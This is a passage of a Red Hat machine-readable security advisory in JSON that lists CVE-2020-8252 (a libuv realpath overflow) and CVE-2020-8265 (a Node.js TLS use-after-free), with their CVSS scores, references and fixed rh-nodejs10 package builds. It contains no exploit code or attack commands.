overflow. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "libuv: buffer overflow in realpath", "title": "Vulnerability summary" }, { "category": "other", "text": "As shipped in Red Hat Software Collections (nodejs-10 \u0026 nodejs-12) as well as Red Hat Enterprise Linux 8 (nodejs-10 and nodejs-12), no incorrect use of the `UV__PATH_MAX` macro were found. Although the releases of libuv contained in these versions of nodejs are considered \"Affected\", it is considered not feasible to trigger the flaw.\n\nNodeJS is included in Red Hat Quay as a dependency of Yarn which is only used while building Red Hat Quay, and not during runtime.\n\nRed Hat Enterprise Linux 8 ships libuv-1.23.1, which is not vulnerable to this flaw.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8252" }, { "category": "external", "summary": "RHBZ#1879315", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1879315" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8252", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8252" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8252", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8252" } ], "release_date": "2020-09-15T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "libuv: buffer overflow in realpath" }, { "cve": "CVE-2020-8265", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912854" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure. This may be exploited to corrupt memory leading to a Denial of Service or potentially other exploits.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: use-after-free in the TLS implementation", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8265" }, { "category": "external", "summary": "RHBZ#1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8265", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8265" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265" }, { "category": "external", "summary": "https://hackerone.com/reports/988103", "url": "https://hackerone.com/reports/988103" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", 